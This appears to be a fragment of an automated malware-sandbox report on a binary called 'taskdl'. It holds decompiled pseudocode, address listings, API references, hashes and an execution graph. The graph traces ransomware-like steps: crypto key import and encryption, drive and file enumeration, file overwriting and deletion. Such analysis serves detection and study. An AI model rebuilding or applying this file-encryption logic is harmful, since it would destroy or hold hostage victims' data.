								_t160 = _t160 + 8;
								_t148 = _t148 + 0x10;
								_t142 = _t142 - 1;
							} while (_t142 != 0);
							_t68 =  *(_t160 + 0x20);
							_t109 =  *(_t160 + 0x10);
						}
						_t143 =  *((intOrPtr*)(_t109 + 8));
						_t149 = _t104;
						if(_t104 == _t143) {
							L44:
							 *((intOrPtr*)(_t109 + 8)) =  *((intOrPtr*)(_t109 + 8)) + _t68;
							return _t68;
						} else {
							goto L31;
						}
						do {
							L31:
							__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z(_t158, 0,  *__imp__?npos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@2IB);
							_t149 = _t149 + 0x10;
						} while (_t149 != _t143);
						_t115 =  *(_t160 + 0x10);
						_t73 =  *(_t160 + 0x20);
						 *((intOrPtr*)(_t115 + 8)) =  *((intOrPtr*)( *(_t160 + 0x10) + 8)) + _t73;
						return _t73;
					}
				} else {
					_t117 =  *((intOrPtr*)(__ecx + 4));
					if(_t117 == 0) {
						L3:
						_t77 = _t136;
					} else {
						_t77 = _t144 - _t117 >> 4;
						if(_t136 >= _t77) {
							goto L3;
						}
					}
					if(_t117 != 0) {
						_t151 = _t144 - _t117 >> 4;
					} else {
						_t151 = 0;
					}
					_t78 = _t77 + _t151;
					 *(_t160 + 0x14) = _t78;
					if(_t78 < 0) {
						_t78 = 0;
					}
					_t79 = _t78 << 4;
					_push(_t79);
					L004018F0();
					_t159 =  *(_t160 + 0x14);
					 *(_t160 + 0x1c) = _t79;
					_t106 = _t79;
					_t152 =  *((intOrPtr*)(_t159 + 4));
					_t161 = _t160 + 4;
					if(_t152 !=  *(_t160 + 0x24)) {
						do {
							E00401690(_t117, _t106, _t152);
							_t101 =  *((intOrPtr*)(_t161 + 0x28));
							_t152 = _t152 + 0x10;
							_t161 = _t161 + 8;
							_t106 = _t106 + 0x10;
						} while (_t152 != _t101);
					}
					_t153 = _t106;
					if(_t136 > 0) {
						 *(_t161 + 0x24) = _t136;
						do {
							_t117 =  *((intOrPtr*)(_t161 + 0x28));
							E00401690( *((intOrPtr*)(_t161 + 0x28)), _t153,  *((intOrPtr*)(_t161 + 0x28)));
							_t98 =  *((intOrPtr*)(_t161 + 0x2c));
							_t161 = _t161 + 8;
							_t153 = _t153 + 0x10;
							_t99 = _t98 - 1;
							 *(_t161 + 0x24) = _t99;
						} while (_t99 != 0);
					}
					_t154 =  *((intOrPtr*)(_t161 + 0x20));
					_t81 = (_t136 << 4) + _t106;
					_t107 =  *((intOrPtr*)(_t159 + 8));
					if(_t154 != _t107) {
						 *((intOrPtr*)(_t161 + 0x20)) = _t81;
						do {
							_t81 = E00401690(_t117,  *((intOrPtr*)(_t161 + 0x20)), _t154);
							_t121 =  *((intOrPtr*)(_t161 + 0x28));
							_t154 = _t154 + 0x10;
							_t161 = _t161 + 8;
							_t117 = _t121 + 0x10;
							 *((intOrPtr*)(_t161 + 0x20)) = _t121 + 0x10;
						} while (_t154 != _t107);
					}
					_t108 =  *((intOrPtr*)(_t159 + 8));
					_t155 =  *((intOrPtr*)(_t159 + 4));
					while(_t155 != _t108) {
						__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(1);
						_t155 = _t155 + 0x10;
					}
					E004018D0(_t81,  *((intOrPtr*)(_t159 + 4)));
					_t135 =  *((intOrPtr*)(_t161 + 0x1c));
					_t119 =  *((intOrPtr*)(_t159 + 4));
					 *((intOrPtr*)(_t159 + 0xc)) = ( *(_t161 + 0x18) << 4) + _t135;
					if(_t119 != 0) {
						 *((intOrPtr*)(_t159 + 4)) = _t135;
						_t91 = (( *((intOrPtr*)(_t159 + 8)) - _t119 >> 4) + _t136 << 4) + _t135;
						 *((intOrPtr*)(_t159 + 8)) = _t91;
						return _t91;
					} else {
						 *((intOrPtr*)(_t159 + 4)) = _t135;
						_t95 = (_t136 << 4) + _t135;
						 *((intOrPtr*)(_t159 + 8)) = _t95;
						return _t95;
					}
				}
			}















































                                                      0x004013d0
                                                      0x004013d9
                                                      0x004013dd
                                                      0x004013e3
                                                      0x004013e8
                                                      0x004013ec
                                                      0x0040152b
                                                      0x00401538
                                                      0x004015e9
                                                      0x004015f2
                                                      0x004015f6
                                                      0x004015f8
                                                      0x004015fc
                                                      0x00401600
                                                      0x0040161e
                                                      0x0040161e
                                                      0x00401623
                                                      0x00401627
                                                      0x0040164f
                                                      0x0040164f
                                                      0x00401652
                                                      0x00401656
                                                      0x00000000
                                                      0x00000000
                                                      0x00401658
                                                      0x0040165c
                                                      0x0040166a
                                                      0x00401670
                                                      0x00401673
                                                      0x00401677
                                                      0x0040167b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00401629
                                                      0x00401629
                                                      0x0040162f
                                                      0x00401632
                                                      0x0040163d
                                                      0x00401643
                                                      0x00401647
                                                      0x0040164b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00401602
                                                      0x00401602
                                                      0x00401604
                                                      0x00401609
                                                      0x0040160c
                                                      0x0040160f
                                                      0x00401612
                                                      0x00401616
                                                      0x0040161a
                                                      0x00000000
                                                      0x0040161a
                                                      0x00401689
                                                      0x0040153e
                                                      0x00401540
                                                      0x00401542
                                                      0x00401547
                                                      0x0040154b
                                                      0x0040154e
                                                      0x00401550
                                                      0x00401554
                                                      0x0040155a
                                                      0x0040155f
                                                      0x00401563
                                                      0x00401566
                                                      0x00401569
                                                      0x0040156e
                                                      0x0040156e
                                                      0x00401574
                                                      0x00401578
                                                      0x00401578
                                                      0x0040157c
                                                      0x0040157f
                                                      0x0040158a
                                                      0x0040158c
                                                      0x0040158e
                                                      0x00401590
                                                      0x00401595
                                                      0x00401598
                                                      0x0040159b
                                                      0x0040159b
                                                      0x0040159e
                                                      0x004015a2
                                                      0x004015a2
                                                      0x004015a6
                                                      0x004015a9
                                                      0x004015ad
                                                      0x0040167f
                                                      0x0040167f
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004015b3
                                                      0x004015b3
                                                      0x004015c0
                                                      0x004015c6
                                                      0x004015c9
                                                      0x004015cd
                                                      0x004015d1
                                                      0x004015de
                                                      0x004015e4
                                                      0x004015e4
                                                      0x004013f2
                                                      0x004013f2
                                                      0x004013f7
                                                      0x00401404
                                                      0x00401404
                                                      0x004013f9
                                                      0x004013fd
                                                      0x00401402
                                                      0x00000000
                                                      0x00000000
                                                      0x00401402
                                                      0x00401408
                                                      0x00401410
                                                      0x0040140a
                                                      0x0040140a
                                                      0x0040140a
                                                      0x00401413
                                                      0x00401417
                                                      0x0040141b
                                                      0x0040141d
                                                      0x0040141d
                                                      0x0040141f
                                                      0x00401422
                                                      0x00401423
                                                      0x00401428
                                                      0x0040142c
                                                      0x00401430
                                                      0x00401436
                                                      0x00401439
                                                      0x0040143e
                                                      0x00401440
                                                      0x00401442
                                                      0x00401447
                                                      0x0040144b
                                                      0x0040144e
                                                      0x00401451
                                                      0x00401454
                                                      0x00401440
                                                      0x0040145a
                                                      0x0040145c
                                                      0x0040145e
                                                      0x00401462
                                                      0x00401462
                                                      0x00401468
                                                      0x0040146d
                                                      0x00401471
                                                      0x00401474
                                                      0x00401477
                                                      0x00401478
                                                      0x00401478
                                                      0x00401462
                                                      0x0040147e
                                                      0x00401487
                                                      0x0040148a
                                                      0x0040148f
                                                      0x00401491
                                                      0x00401495
                                                      0x0040149b
                                                      0x004014a0
                                                      0x004014a4
                                                      0x004014a7
                                                      0x004014aa
                                                      0x004014af
                                                      0x004014af
                                                      0x00401495
                                                      0x004014b5
                                                      0x004014b8
                                                      0x004014bd
                                                      0x004014c3
                                                      0x004014c9
                                                      0x004014cc
                                                      0x004014d4
                                                      0x004014dd
                                                      0x004014e1
                                                      0x004014ee
                                                      0x004014f1
                                                      0x0040150f
                                                      0x0040151d
                                                      0x00401520
                                                      0x00401528
                                                      0x004014f3
                                                      0x004014f5
                                                      0x004014fe
                                                      0x00401501
                                                      0x00401509
                                                      0x00401509
                                                      0x004014f1

                                                      APIs
                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00401423
                                                      • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,00000001,?), ref: 004014C3
                                                      • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP60(?,00000000,?,77045320,00000000,00000000,?,?,00000001,?), ref: 004015C0
                                                      • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP60(?,00000000,?,77045320,00000000,00000000,?,?,00000001,?), ref: 0040163D
                                                      • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP60(?,00000000,?,77045320,00000000,00000000,?,?,00000001,?), ref: 0040166A
                                                        • Part of subcall function 00401690: ?_Xran@std@@YAXXZ.MSVCP60(?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,77045320,00000000,00000000,?,?), ref: 004016EE
                                                        • Part of subcall function 00401690: ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60(?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,77045320,00000000,00000000,?,?), ref: 004016F6
                                                        • Part of subcall function 00401690: ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000), ref: 0040172D
                                                        • Part of subcall function 00401690: ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(?), ref: 0040173A
                                                        • Part of subcall function 00401690: ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60 ref: 00401742
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3015229018.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000A.00000002.3015183023.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 0000000A.00000002.3015270257.0000000000402000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 0000000A.00000002.3015310361.0000000000404000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_taskdl.jbxd
                                                      Similarity
                                                      • API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$V12@$?assign@?$basic_string@$Split@?$basic_string@$??2@Eos@?$basic_string@Grow@?$basic_string@Tidy@?$basic_string@Xran@std@@
                                                      • String ID:
                                                      • API String ID: 3154500504-0
                                                      • Opcode ID: 6636b44b641b77d4c97a97785cbcd8c41d41e59366c3e557b6000251a80c17ff
                                                      • Instruction ID: 1a94831c173c9211e28d46cdbba668eac71917d736910117d3345b582314b656
                                                      • Opcode Fuzzy Hash: 6636b44b641b77d4c97a97785cbcd8c41d41e59366c3e557b6000251a80c17ff
                                                      • Instruction Fuzzy Hash: FA81B472A003109BD710DE18CC8492AB7E5FBC8358F094A3EED49BB391D636EE05CB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:10.9%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:19.3%
                                                      Total number of Nodes:1584
                                                      Total number of Limit Nodes:17
                                                      execution_graph 5449 408c40 5450 408d5c 5449->5450 5452 408c97 5449->5452 5451 408c9d _ftol _ftol 5451->5452 5452->5450 5452->5451 5912 401140 #4710 SendMessageA SendMessageA #537 5917 401970 #3092 #6199 #800 5912->5917 5914 401199 SetTimer 5915 4011c3 CreateThread 5914->5915 5916 4011dd 5914->5916 5915->5916 5918 4012d0 5915->5918 5917->5914 5921 4012e0 sprintf sprintf GetFileAttributesA 5918->5921 5922 4013b0 fopen 5921->5922 5923 401350 5921->5923 5925 4012d9 5922->5925 5926 4013ef fread fclose sprintf fopen 5922->5926 5943 404640 InitializeCriticalSection 5923->5943 5926->5925 5928 401471 fread fclose sprintf fopen 5926->5928 5927 401359 5944 4047c0 5927->5944 5928->5925 5929 4014f2 fread fclose 5928->5929 5961 40be90 strncpy strncpy strncpy 5929->5961 5932 401377 5934 401395 DeleteFileA 5932->5934 5935 40137b 5932->5935 5933 401525 5962 40c240 5933->5962 5960 404690 DeleteCriticalSection 5934->5960 6005 404690 DeleteCriticalSection 5935->6005 5939 401575 5939->5925 6004 404640 InitializeCriticalSection 5939->6004 5941 40158c 5942 4047c0 16 API calls 5941->5942 5942->5935 5943->5927 5945 4046b0 CryptAcquireContextA 5944->5945 5947 40484e 5945->5947 5946 4048f3 5946->5932 5947->5946 5948 4049b0 7 API calls 5947->5948 5949 40486e 5948->5949 5950 4048e5 _local_unwind2 5949->5950 5952 4049b0 7 API calls 5949->5952 5950->5946 5953 40488a 5952->5953 5953->5950 5954 404895 CryptEncrypt 5953->5954 5954->5950 5955 404908 CryptDecrypt 5954->5955 5955->5950 5956 404932 strncmp 5955->5956 5957 404984 5956->5957 5958 40495e _local_unwind2 5956->5958 6006 4049a6 5957->6006 5958->5932 5960->5922 5961->5933 5963 40c25f 5962->5963 5964 40bed0 110 API calls 5963->5964 5965 40c29b 5964->5965 5966 40c2a2 5965->5966 5967 40c2c8 5965->5967 5968 40c2bc 5966->5968 5969 40c2ad SendMessageA 5966->5969 5970 40c2e5 5967->5970 5971 40c2d9 SendMessageA 5967->5971 5973 40dbf0 free 5968->5973 5969->5968 5972 40dc00 4 API calls 5970->5972 5971->5970 5974 40c2f8 5972->5974 5999 40c3d8 5973->5999 5975 40dc00 4 API calls 5974->5975 5976 40c313 5975->5976 5977 40dd00 4 API calls 5976->5977 5978 40c324 5977->5978 5979 40dd00 4 API calls 5978->5979 5980 40c335 5979->5980 5981 40dc00 4 API calls 5980->5981 5982 40c350 5981->5982 5983 40dc00 4 API calls 5982->5983 5984 40c36b 5983->5984 5985 40dc00 4 API calls 5984->5985 5986 40c37d 5985->5986 5987 40c3e0 5986->5987 5988 40c3a9 5986->5988 5989 40c3f0 5987->5989 5990 40c3e4 SendMessageA 5987->5990 5991 40c3b9 5988->5991 5992 40c3ad SendMessageA 5988->5992 5993 40c419 5989->5993 5994 40c44d 5989->5994 5990->5989 5995 40dbf0 free 5991->5995 5992->5991 5996 40c429 5993->5996 5997 40c41d SendMessageA 5993->5997 5998 40c49c 5994->5998 6001 40c45e fopen 5994->6001 5995->5999 6003 40dbf0 free 5996->6003 5997->5996 5998->5968 6000 40c4a0 SendMessageA 5998->6000 5999->5939 6000->5968 6001->5998 6002 40c479 fwrite fclose 6001->6002 6002->5998 6003->5999 6004->5941 6005->5925 6007 404770 3 API calls 6006->6007 6008 4049ad 6007->6008 6008->5946 6132 409a40 6136 409d40 6132->6136 6135 409ae7 #2414 #2414 6137 409a87 OffsetRect CreateRectRgn #1641 #5781 6136->6137 6137->6135 6363 409f40 PtVisible 6364 40cf40 6372 40d300 6364->6372 6366 40cf61 6367 40d300 6 API calls 6366->6367 6368 40cf66 6366->6368 6369 40cf87 6367->6369 6370 40d300 6 API calls 6369->6370 6371 40cf8c 6369->6371 6370->6371 6373 40d31f 6372->6373 6374 40d32e 6372->6374 6373->6366 6375 40d339 6374->6375 6376 40d373 time 6374->6376 6378 40d363 6374->6378 6379 40d378 6374->6379 6375->6366 6380 40d493 6376->6380 6381 40d41e 6376->6381 6394 40d2b0 6378->6394 6383 40d3b0 6379->6383 6384 40d380 6379->6384 6385 40d4b1 6380->6385 6390 40d4a8 free 6380->6390 6381->6380 6392 40d487 time 6381->6392 6393 40d469 Sleep 6381->6393 6398 412a90 malloc 6383->6398 6386 40d2b0 memmove 6384->6386 6385->6366 6386->6376 6388 40d3b6 6389 40d3c1 6388->6389 6391 40d2b0 memmove 6388->6391 6389->6366 6390->6385 6391->6376 6392->6380 6392->6381 6393->6381 6395 40d2f5 6394->6395 6396 40d2be 6394->6396 6395->6376 6397 40d2c3 memmove 6396->6397 6397->6395 6397->6397 6398->6388 6141 407650 6142 40765e 6141->6142 6145 407670 6141->6145 6143 4076a0 20 API calls 6142->6143 6146 407665 #2379 6143->6146 6144 407690 #2379 6145->6144 6147 40b620 9 API calls 6145->6147 6148 40768d 6147->6148 6148->6144 5453 404050 #616 5454 404068 5453->5454 5455 40405f #825 5453->5455 5455->5454 6009 404150 6014 404170 #2414 #800 #800 #795 6009->6014 6011 404158 6012 404168 6011->6012 6013 40415f #825 6011->6013 6013->6012 6014->6011 6138 403250 6139 403261 #825 6138->6139 6140 40326a 6138->6140 6139->6140 6149 413254 _exit 6015 413556 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 4642 405a60 4689 40b620 FindWindowW 4642->4689 4646 405aab #2514 4712 403f20 #2414 4646->4712 4648 405ae9 4713 403f20 #2414 4648->4713 4650 405b04 4714 403f20 #2414 4650->4714 4652 405b1f 4715 403f20 #2414 4652->4715 4654 405b3f 4716 403f20 #2414 4654->4716 4656 405b5a 4717 403f20 #2414 4656->4717 4658 405b75 4718 403f20 #2414 4658->4718 4660 405b90 4719 403f20 #2414 4660->4719 4662 405bab 4720 403f20 #2414 4662->4720 4664 405bc6 4721 403f20 #2414 4664->4721 4666 405be1 4722 403f20 #2414 4666->4722 4668 405bfc 4723 403f90 #2414 4668->4723 4670 405c10 4724 403f90 #2414 4670->4724 4672 405c24 #800 #800 #800 #800 #781 4725 4050a0 #800 #795 4672->4725 4674 405c9c 4726 4050a0 #800 #795 4674->4726 4676 405cb0 4727 404170 #2414 #800 #800 #795 4676->4727 4678 405cc4 4728 404170 #2414 #800 #800 #795 4678->4728 4680 405cd8 4729 404170 #2414 #800 #800 #795 4680->4729 4682 405cec 4730 404170 #2414 #800 #800 #795 4682->4730 4684 405d00 4731 405d90 #654 #765 4684->4731 4686 405d14 4732 405d90 #654 #765 4686->4732 4688 405d28 #609 #609 #616 #641 4690 40b634 7 API calls 4689->4690 4691 405a8a #1134 #2621 #6438 4689->4691 4690->4691 4692 40b687 ExitProcess 4690->4692 4693 4060e0 #324 #567 #567 #567 4691->4693 4733 4085c0 7 API calls 4693->4733 4695 406162 4696 4085c0 9 API calls 4695->4696 4697 406172 4696->4697 4737 404090 7 API calls 4697->4737 4699 406182 4738 404090 7 API calls 4699->4738 4701 406192 4739 404090 7 API calls 4701->4739 4703 4061a2 4740 404090 7 API calls 4703->4740 4705 4061b2 4741 405000 #567 #540 4705->4741 4707 4061c2 4708 405000 2 API calls 4707->4708 4709 4061d2 #567 #540 #540 #540 #540 4708->4709 4743 407640 4709->4743 4711 4062cb 7 API calls 4711->4646 4712->4648 4713->4650 4714->4652 4715->4654 4716->4656 4717->4658 4718->4660 4719->4662 4720->4664 4721->4666 4722->4668 4723->4670 4724->4672 4725->4674 4726->4676 4727->4678 4728->4680 4729->4682 4730->4684 4731->4686 4732->4688 4734 408660 #6140 4733->4734 4735 408654 4733->4735 4734->4695 4735->4734 4736 40865a GetSysColor 4735->4736 4736->4734 4737->4699 4738->4701 4739->4703 4740->4705 4742 40504a 4741->4742 4742->4707 4743->4711 4754 40db60 send 5456 403860 SendMessageA 5457 403892 SendMessageA 5456->5457 5458 403883 #1200 5456->5458 5459 4038d1 5457->5459 5460 4038a5 SendMessageA CreateThread 5457->5460 5460->5459 5461 4038e0 5460->5461 5464 4038f0 5461->5464 5463 4038e9 5483 403eb0 6 API calls 5464->5483 5466 403916 SendMessageA 5467 4039e1 5466->5467 5468 403937 SendMessageA 5466->5468 5530 403eb0 6 API calls 5467->5530 5469 403951 5468->5469 5470 403958 5468->5470 5484 403af0 fopen 5469->5484 5501 401e90 5470->5501 5474 4039ea CloseHandle 5474->5463 5475 403961 sprintf 5506 402020 5475->5506 5477 403998 5478 40399c 5477->5478 5515 403a20 5477->5515 5479 4039cd 5478->5479 5481 4039c8 #1200 5478->5481 5523 401f30 5479->5523 5481->5479 5483->5466 5485 403b41 5484->5485 5486 403b28 5484->5486 5487 401e90 InitializeCriticalSection 5485->5487 5486->5470 5488 403b4d 5487->5488 5489 402020 14 API calls 5488->5489 5490 403b67 5489->5490 5491 403b6b 5490->5491 5499 403b9b 5490->5499 5492 401f30 6 API calls 5491->5492 5494 403b82 5492->5494 5493 403c61 fclose 5495 401f30 6 API calls 5493->5495 5494->5470 5497 403c8f 5495->5497 5496 403bb2 fgets 5498 403c5f 5496->5498 5496->5499 5497->5470 5498->5493 5499->5493 5499->5496 5499->5498 5531 402650 MultiByteToWideChar 5499->5531 5623 404640 InitializeCriticalSection 5501->5623 5503 401eb6 5624 404640 InitializeCriticalSection 5503->5624 5505 401ec4 5505->5475 5625 4046f0 5506->5625 5508 402031 5509 402035 5508->5509 5510 402048 GlobalAlloc 5508->5510 5511 4046f0 12 API calls 5508->5511 5509->5477 5512 402061 5510->5512 5513 402066 GlobalAlloc 5510->5513 5511->5510 5512->5477 5514 402079 5513->5514 5514->5477 5516 403a32 GetLogicalDrives 5515->5516 5517 403adc 5515->5517 5521 403a48 5516->5521 5517->5478 5518 403a53 GetDriveTypeW 5519 403a81 GetDiskFreeSpaceExW 5518->5519 5518->5521 5519->5521 5520 403ace 5520->5478 5521->5518 5521->5520 5663 4026b0 5521->5663 5753 401fa0 5523->5753 5525 401f60 5762 404690 DeleteCriticalSection 5525->5762 5527 401f7a 5763 404690 DeleteCriticalSection 5527->5763 5529 401f8a 5529->5467 5530->5474 5534 402560 wcscpy wcsrchr 5531->5534 5533 40269a 5533->5499 5535 4025c9 wcscat 5534->5535 5536 402599 _wcsicmp 5534->5536 5537 4025bd 5535->5537 5536->5537 5538 4025ae _wcsicmp 5536->5538 5547 4020a0 CreateFileW 5537->5547 5538->5535 5538->5537 5540 4025eb 5541 402629 DeleteFileW 5540->5541 5542 4025ef DeleteFileW 5540->5542 5543 402634 5541->5543 5542->5543 5544 4025fa 5542->5544 5543->5533 5545 402617 5544->5545 5546 4025fe MoveFileW 5544->5546 5545->5533 5546->5533 5548 402143 GetFileTime ReadFile 5547->5548 5566 402139 _local_unwind2 5547->5566 5550 40217c 5548->5550 5548->5566 5551 402196 ReadFile 5550->5551 5550->5566 5552 4021b3 5551->5552 5551->5566 5553 4021c3 ReadFile 5552->5553 5552->5566 5554 4021ea ReadFile 5553->5554 5553->5566 5555 402208 ReadFile 5554->5555 5554->5566 5556 402226 5555->5556 5555->5566 5557 402233 CloseHandle CreateFileW 5556->5557 5558 4022f9 CreateFileW 5556->5558 5560 402264 SetFilePointer ReadFile 5557->5560 5557->5566 5559 40232c 5558->5559 5558->5566 5580 404af0 5559->5580 5562 402297 5560->5562 5560->5566 5564 4022a4 SetFilePointer WriteFile 5562->5564 5562->5566 5563 40234d 5565 402372 5563->5565 5569 404af0 4 API calls 5563->5569 5564->5566 5567 4022ce 5564->5567 5565->5566 5585 40a150 5565->5585 5566->5540 5567->5566 5568 4022db SetFilePointer SetEndOfFile 5567->5568 5571 402497 SetFileTime 5568->5571 5569->5565 5572 4024e0 _local_unwind2 5571->5572 5573 4024bc CloseHandle MoveFileW 5571->5573 5572->5540 5573->5572 5575 402477 SetFilePointerEx SetEndOfFile 5575->5571 5576 4023e0 ReadFile 5576->5566 5577 4023a7 5576->5577 5577->5566 5577->5575 5577->5576 5592 40b3c0 5577->5592 5581 404b04 EnterCriticalSection CryptDecrypt 5580->5581 5582 404afc 5580->5582 5583 404b3b LeaveCriticalSection 5581->5583 5584 404b2d LeaveCriticalSection 5581->5584 5582->5563 5583->5563 5584->5563 5586 40a184 5585->5586 5587 40a15e ??0exception@@QAE@ABQBD _CxxThrowException 5585->5587 5588 40a197 ??0exception@@QAE@ABQBD _CxxThrowException 5586->5588 5589 40a1bd 5586->5589 5587->5586 5588->5589 5590 40a1d0 ??0exception@@QAE@ABQBD _CxxThrowException 5589->5590 5591 40a1f6 5589->5591 5590->5591 5591->5577 5593 40b3d0 ??0exception@@QAE@ABQBD _CxxThrowException 5592->5593 5594 40b3ee 5592->5594 5593->5594 5595 40b602 ??0exception@@QAE@ABQBD _CxxThrowException 5594->5595 5603 40b410 5594->5603 5596 40b5ba 5598 40b0c0 4 API calls 5596->5598 5604 402424 WriteFile 5596->5604 5598->5596 5600 40b4cf ??0exception@@QAE@ABQBD _CxxThrowException 5602 40b4ed 5600->5602 5601 40b59c ??0exception@@QAE@ABQBD _CxxThrowException 5601->5596 5602->5596 5602->5601 5602->5604 5611 40adc0 5602->5611 5603->5600 5603->5602 5603->5603 5603->5604 5605 40b0c0 5603->5605 5604->5566 5604->5577 5606 40b0d0 ??0exception@@QAE@ABQBD _CxxThrowException 5605->5606 5607 40b0ee 5605->5607 5606->5607 5610 40b114 5607->5610 5617 40a9d0 5607->5617 5610->5603 5610->5610 5612 40add0 ??0exception@@QAE@ABQBD _CxxThrowException 5611->5612 5613 40adee 5611->5613 5612->5613 5614 40ae14 5613->5614 5620 40a610 5613->5620 5614->5602 5618 40a9e1 ??0exception@@QAE@ABQBD _CxxThrowException 5617->5618 5619 40a9ff 5617->5619 5618->5619 5619->5603 5621 40a621 ??0exception@@QAE@ABQBD _CxxThrowException 5620->5621 5622 40a63f 5620->5622 5621->5622 5622->5602 5623->5503 5624->5505 5642 4046b0 5625->5642 5627 4046f8 5628 404709 5627->5628 5629 4046fc 5627->5629 5631 404711 CryptImportKey 5628->5631 5632 40473e 5628->5632 5647 404770 5629->5647 5635 404760 5631->5635 5636 404731 5631->5636 5654 4049b0 CreateFileA 5632->5654 5635->5508 5637 404770 3 API calls 5636->5637 5639 404738 5637->5639 5638 40474c 5638->5635 5640 404770 3 API calls 5638->5640 5639->5508 5641 40475a 5640->5641 5641->5508 5643 4046b7 CryptAcquireContextA 5642->5643 5644 4046e0 5643->5644 5645 4046d7 5643->5645 5644->5627 5645->5643 5646 4046dd 5645->5646 5646->5627 5648 404788 5647->5648 5649 40477a CryptDestroyKey 5647->5649 5650 40479d 5648->5650 5651 40478f CryptDestroyKey 5648->5651 5649->5648 5652 404703 5650->5652 5653 4047a4 CryptReleaseContext 5650->5653 5651->5650 5652->5508 5653->5652 5655 404a1b _local_unwind2 5654->5655 5656 404a09 GetFileSize 5654->5656 5655->5638 5656->5655 5657 404a25 5656->5657 5657->5655 5659 404a38 GlobalAlloc 5657->5659 5659->5655 5660 404a49 ReadFile 5659->5660 5660->5655 5661 404a64 CryptImportKey 5660->5661 5661->5655 5662 404a81 _local_unwind2 5661->5662 5662->5638 5664 40c8f0 #823 5663->5664 5665 4026e4 5664->5665 5666 40c8f0 #823 5665->5666 5667 402706 swprintf FindFirstFileW 5666->5667 5668 40274d 5667->5668 5682 4027b4 5667->5682 5702 402e00 5668->5702 5670 40276a #825 5672 402e00 2 API calls 5670->5672 5671 4027d4 wcscmp 5674 40295d FindNextFileW 5671->5674 5675 4027ee wcscmp 5671->5675 5676 4027a0 #825 5672->5676 5673 402978 FindClose 5680 40298d 5673->5680 5684 4029b9 5673->5684 5674->5673 5674->5682 5675->5674 5677 402808 swprintf GetFileAttributesW 5675->5677 5679 402ace 5676->5679 5681 4028b6 wcscmp 5677->5681 5677->5682 5678 4029ef swprintf DeleteFileW swprintf DeleteFileW 5685 402a6a #825 5678->5685 5686 402a4f 5678->5686 5679->5521 5680->5684 5692 402560 59 API calls 5680->5692 5681->5674 5683 4028d0 wcscmp 5681->5683 5682->5671 5682->5673 5682->5674 5695 402856 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N wcslen ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI 5682->5695 5708 402af0 _wcsnicmp 5682->5708 5683->5674 5688 4028e6 wcscmp 5683->5688 5684->5678 5694 4026b0 84 API calls 5684->5694 5690 402a94 5685->5690 5691 402aba #825 5685->5691 5697 402a66 5686->5697 5734 402e90 5686->5734 5688->5674 5693 4028fc ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N wcslen ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI 5688->5693 5690->5691 5699 402e90 2 API calls 5690->5699 5691->5679 5692->5680 5696 402da0 8 API calls 5693->5696 5694->5684 5730 402da0 #823 5695->5730 5700 4028a3 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 5696->5700 5697->5685 5699->5690 5700->5674 5703 402e7a 5702->5703 5707 402e10 5702->5707 5703->5670 5704 402e4c #825 5705 402e6d 5704->5705 5704->5707 5705->5670 5706 402e40 #825 5706->5704 5707->5704 5707->5706 5709 402b12 wcsstr 5708->5709 5710 402b1f 5708->5710 5709->5710 5711 402b30 _wcsicmp 5710->5711 5712 402be9 _wcsicmp 5710->5712 5713 402b42 5711->5713 5714 402b4d _wcsicmp 5711->5714 5715 402c07 _wcsicmp 5712->5715 5716 402bfc 5712->5716 5713->5682 5719 402b67 _wcsicmp 5714->5719 5720 402b5c 5714->5720 5717 402c21 _wcsicmp 5715->5717 5718 402c16 5715->5718 5716->5682 5717->5682 5718->5682 5721 402b81 _wcsicmp 5719->5721 5722 402b76 5719->5722 5720->5682 5723 402b90 5721->5723 5724 402b9b _wcsicmp 5721->5724 5722->5682 5723->5682 5725 402bb5 wcsstr 5724->5725 5726 402baa 5724->5726 5727 402bc4 5725->5727 5728 402bcf wcsstr 5725->5728 5726->5682 5727->5682 5728->5712 5729 